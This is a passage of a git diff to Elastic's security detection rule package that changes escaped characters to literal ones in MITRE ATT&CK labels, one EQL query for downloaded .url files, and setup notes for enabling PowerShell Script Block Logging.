f3b6f324d19..c0a589b9535 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_106.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json index 3bd3307aa67..e25c34c8b64 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json +++ b/packages/security_detection_engine/kibana/security_rule/cc92c835-da92-45c9-9f29-b4992ad621a0_207.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json index c4a6c669651..d0f507982d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_103.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json index 1de721bc67e..0c6f14c82e6 100644 --- a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_104.json @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json index ae6b2797b99..f59c393a614 100644 --- a/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ccc55af4-9882-4c67-87b4-449a7ae8079c_105.json @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json index 5acf563faf8..3986bcaae2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json index e6e2f741929..fd164c30965 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_103.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json index f3583726b64..ce6ed88f2da 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json index ef0f0699523..2732498db3e 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json index 23178e71f2e..57e353e0982 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json +++ b/packages/security_detection_engine/kibana/security_rule/cd16fb10-0261-46e8-9932-a0336278cdbe_206.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json index d1c5f525db2..3c9538bb7af 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0042", "name": "Resource Development", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json index d0a76f10637..a8c42beb531 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0042", "name": "Resource Development", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json index 31a8ed11e8a..f76a6cf0f15 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a419-9b3f-4f57-8ff8-ac4cd2d5f530_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0042", "name": "Resource Development", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json index fa9db201891..433cd2d2870 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json index 9ab394e13fb..374ce2a173c 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json index c546cd3e0f3..0733b90a8ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_105.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json index 546fcd55c19..bdfc342c36b 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_106.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json index c8c1545907c..f1ede348153 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json b/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json index c27f428ef54..ebfc04bbd3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Downloaded URL Files", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"url\"\n and file.Ext.windows.zone_identifier \u003e 1 and not process.name : \"explorer.exe\"\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"url\"\n and file.Ext.windows.zone_identifier > 1 and not process.name : \"explorer.exe\"\n", "related_integrations": [ { "package": "endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json index 2a7c059b5a3..7cf281da39b 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json index 1e845277b6e..46682f2552b 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json index ffff8c305a2..0ba0a8f90e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json index c164276c048..7717b06a301 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json index cc4f1ed5282..30131f4b681 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json index d6005bda1a1..5830a88e2fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json index e32d125263f..15da5551c55 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json index 8fcb10162c2..07d88a0d4ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json index 1072201f250..bcf336d9f62 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json index e0e4c2ca683..8d648402e25 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json index 95047d36989..e6970b6ff30 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json index 336dcc00f23..7c2cec79a83 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json index 6ad1ba832fd..4f6ecf027b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json index e87eb673081..75d7d624a2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json index fbe15ab1784..d7f171f8600 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json index 17a3c91630f..a041b4180c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json index 015409bd0e4..d3aff5eb165 100644 --- 